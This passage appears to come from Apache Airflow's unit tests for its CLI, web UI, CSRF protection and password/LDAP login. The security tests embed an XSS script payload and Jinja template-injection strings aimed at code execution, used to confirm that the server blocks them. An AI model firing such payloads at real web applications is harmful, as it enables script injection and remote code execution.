'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=section-1-task-1&"
"dag_id=example_subdag_operator.section-1&future=false&past=false&"
"upstream=false&downstream=true&recursive=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
